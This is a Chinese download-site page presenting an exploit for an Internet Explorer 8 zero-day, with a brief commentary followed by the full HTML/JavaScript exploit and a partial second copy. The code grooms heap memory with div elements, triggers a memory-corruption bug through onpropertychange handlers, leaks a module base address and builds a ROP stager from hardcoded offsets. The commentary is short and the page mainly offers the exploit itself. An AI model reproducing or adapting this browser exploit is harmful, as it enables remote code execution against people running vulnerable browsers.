深入分析IE8 0day漏洞exploit

需积分: 3 68 浏览量更新于2024-09-16 收藏 9KB TXT 举报

"对IE8 0day漏洞利用代码的分析学习" 本文将深入探讨一个针对Internet Explorer 8（简称IE8）的0day漏洞利用代码，这个代码被标记为"ie80dayexp"。0day漏洞是指在软件供应商知道之前就被恶意利用的安全漏洞，它们极其危险，因为用户无法通过常规的更新来防范。在这个特定的案例中，攻击者通过精心构造的JavaScript代码来触发漏洞，从而可能导致远程代码执行，使攻击者能够在受害者的系统上获取控制。分析这段代码，我们可以看到几个关键的组成部分： 1. **变量largeBuffer**：`largeBuffer`变量被初始化为一系列的`%uCCCC%uCCCC`，这是Unicode编码的表示，通常用于填充或构造内存中的特定模式。在某些漏洞利用中，这样的填充可能会帮助攻击者控制内存的布局。 2. **函数funhellokey**：这个函数接受一个`dword`参数，将其转换为16进制字符串，并在前导位不足时补零。然后，它使用`unescape`函数来创建一个特殊的Unicode字符串，这可能是为了构造内存中的特定数据结构。 3. **函数funloadon**：这个函数是整个利用的核心。它首先定义了一个常量`tag`，接着用`funhellokey`函数的返回值和额外的字符串来创建一个长数组`vtable1`。然后，它创建了两个新的`div`元素和一个包含137个`div`元素的数组。这些`div`元素随后被用来触发浏览器的特定行为。 4. **事件处理和属性修改**：`expvalueclass`和`expvaluedtkvee`两个`div`元素设置了`onpropertychange`事件，然后通过属性修改来触发漏洞。特别是`expvalueclass`的`style.position`被连续设置为空字符串，这可能与触发特定的内存访问模式有关。最后，`divs`数组中的元素标题被设置为`vtable1`，这可能是为了影响内存中的指针。 5. **颜色设置**：`expvalueclass.style.color='red'`这一行可能是为了掩盖真正的目的，因为它并不会直接影响漏洞利用过程，但可能会引起用户的注意。这个漏洞利用过程可能涉及到内存破坏，通过改变对象的属性来操纵内存中的指针，从而达到执行任意代码的目的。由于这是一个0day漏洞，当时用户没有可用的补丁，因此攻击者可以轻易地利用这个漏洞进行攻击。这段代码展示了恶意攻击者如何利用JavaScript的特性来尝试触发浏览器的内存安全漏洞。理解和分析这种代码有助于安全研究人员开发防御策略，同时提醒用户及时更新他们的软件以防止类似的攻击。

<html> <head> <script>var largeBuffer = unescape('%uCCCC%uCCCC%uCCCC%uCCCC%uCCCC%uCCCC'); function funhellokey(dword) { var d = Number(dword).toString(16); while (d.length < 8) d = '0' + d; return unescape('%u' + d.substr(4, 8) + '%u' + d.substr(0, 4));}; function funloadon() { var tag = 0x12345678; var vtable1 = funhellokey(tag) + '11111110000000000'; var tarrybuf = new Array(); for (i = 0; i < 4096; i++) tarrybuf[i] = '' + vtable1; var divs = new Array(); for (var i = 0; i < 137; i++) divs.push(document.createElement('div')); var expvalueclass = document.createElement('div'); var expvaluedtkvee = document.createElement('div'); document.body.appendChild(expvalueclass); document.body.appendChild(expvaluedtkvee); expvalueclass.onpropertychange = expvalueclass.attributes; expvaluedtkvee.onpropertychange = expvaluedtkvee.attributes; for (var i = 0; i < 27; i++) expvalueclass.style.position = ''; expvalueclass.onpropertychange = null; expvalueclass.onpropertychange; divs[0].title = vtable1; divs[1].title = vtable1; divs[2].title = vtable1; divs[3].title = vtable1; expvalueclass.style.color = 'red'; var tempkktvalue = 0; for (var i = 0; i < 4; i++) { var adtakever = divs[i].title.substr(0, 2); adtakever = escape(adtakever).replace(/%u(\w\w\w\w)%u(\w\w\w\w)/, "0x$2$1"); adtakever = parseInt(adtakever); if (isNaN(adtakever)) continue; if (adtakever != tag) { tempkktvalue = ((adtakever & 0xFFFF0000) - 0x530000); break; }; }; if (tempkktvalue == 0) { location.reload(); return false; }; var temppvalue11 = 0; var ttt = funhellokey(tempkktvalue + 0x00069f57); var temppvalue13 = 0; var temppvalue14 = 0; var gethookver = 0; var and_eax_ecx_ret = 0; var temppvalue16 = 0; var valuettgot09 = 0; var valuettgot10 = 0; var valuettgot11 = 0; var valuettgot12 = 0; var valuettgot13 = 0; var valuettgotex = 0x001e2cde; var valuettgotexd = 17; var alertvaluewar = 0x000ce96e; alertvaluewatchIn = 18; temppvalue11 = funhellokey(tempkktvalue + 0x00539000); temppvalue13 = funhellokey(tempkktvalue + 0x0018a7c7); temppvalue14 = funhellokey(tempkktvalue + 0x00070b89); gethookver = funhellokey(tempkktvalue + 0x00002ffe); temppvalue15 = funhellokey(tempkktvalue + 0x0046ae66); temppvalue16 = funhellokey(tempkktvalue + 0x00352845); valuettgot09 = funhellokey(tempkktvalue + 0x0025d780); valuettgot10 = funhellokey(tempkktvalue + 0x00001318); valuettgot11 = funhellokey(tempkktvalue + 0x0018e7f8); valuettgot12 = funhellokey(tempkktvalue + 0x004bdd33); valuettgot13 = funhellokey(tempkktvalue + 0x0051e7db); var ttemphkv = ttt + ttt + ttt + ttt + ttt + ttt + ttt + ttt + ttt + ttt + ttt + ttt + ttt + ttt + ttt + ttt + ttt + ttt + ttt + ttt + ttt + ttt + ttt + ttt + ttt + ttt + ttt + ttt + ttt + ttt + ttt + ttt + ttt + ttt + ttt + ttt; var rop_stager = parseInt('11' + funhellokey(tempkktvalue + 0x00069f57) + 'CCCC' + funhellokey(tempkktvalue + 0x00069f57) + ttemphkv + temppvalue14 + gethookver + funhellokey(0xFFFFF000) + temppvalue15 + '66' + temppvalue16 + '9999' + valuettgot09 + valuettgot10 + valuettgot11 + funhellokey(0x00003000) + funhellokey(0x00000040) + temppvalue11 + temppvalue13 + temppvalue14 + '0000' + gethookver + funhellokey(32) + valuettgot12 + '11' + valuettgot13 + largeBuffer + unescape("%u0000")); var zom = funhellokey(tempkktvalue + valuettgotex); var table_pointer = document.createElement('option').index; var alertvalue = table_pointer + (16 * valuettgotexd) + 8; var alertvaluewatch = table_pointer + (16 * alertvaluewatchIn) + 8; var vtable2 = funhellokey(alertvalue - 4) + '11' + funhellokey(alertvaluewatch - 8) + funhellokey(tempkktvalue + alertvaluewar) + '2222' + funhellokey(tempkktvalue + valuettgotex) + '33' + temppvalue13 + '4'; expvaluedtkvee.style.position = ''; expvaluedtkvee.onpropertychange = null; expvaluedtkvee.onpropertychange; divs[4].title = vtable2; divs[5].title = vtable2; divs[6].title = vtable2; divs[7].title = vtable2; expvaluedtkvee.onpropertychange;}; function Funalertshow(dword) { if (dword < 0) dword = 0xFFFFFFFF + dword + 1; var p = dword.toString(16).toUpperCase(); while (p.length < 8) p = '0' + p; return "0x" + p;} </script> </head> <body onload = 'funloadon()'> </body></html>
<html> <head> <script>
var largeBuffer = unescape('%uCCCC%uCCCC%uCCCC%uCCCC%uCCCC%uCCCC');

function funhellokey(dword) {
var d = Number(dword).toString(16);
while (d.length < 8) d = '0' + d;
return unescape('%u' + d.substr(4, 8) + '%u' + d.substr(0, 4));
};

function funloadon() {
var tag = 0x12345678;
var vtable1 = funhellokey(tag) + '11111110000000000';
var tarrybuf = new Array();
for (i = 0; i < 4096; i++) tarrybuf[i] = '' + vtable1;
var divs = new Array();
for (var i = 0; i < 137; i++) divs.push(document.createElement('div'));
var expvalueclass = document.createElement('div');
var expvaluedtkvee = document.createElement('div');
document.body.appendChild(expvalueclass);
document.body.appendChild(expvaluedtkvee);
expvalueclass.onpropertychange = expvalueclass.attributes;
expvaluedtkvee.onpropertychange = expvaluedtkvee.attributes;
for (var i = 0; i < 27; i++) expvalueclass.style.position = '';
expvalueclass.onpropertychange = null;
expvalueclass.onpropertychange;
divs[0].title = vtable1;
divs[1].title = vtable1;
divs[2].title = vtable1;
divs[3].title = vtable1;

下载后可阅读完整内容，剩余3页未读，立即下载

kindsjay

粉丝: 7
资源: 15

深入分析IE8 0day漏洞exploit

ie80dayexp.

IE4.0 IE5.0 IE5.5 IE6.0集合

Telemecanique Telemecanique 140CPU67160 HSBY Copro firmware V2.11 ie80.rar

ieTest ie6 ie7 ie8 ie9 ie5.5

multiple ie IE3 IE4 IE5 IE6

IE兼容IE6,IE7,IE8,IE9,IE10js文件

解决各种IE兼容问题_IE6_IE7_IE8_IE9_IE10

单系统多IE支持，IE3,IE4,IE5,IE5.5,IE6

ie6 ie5 ie4浏览器兼容ie7

一行代码解决各种IE兼容问题,IE6,IE7,IE8,IE9,IE10

最新资源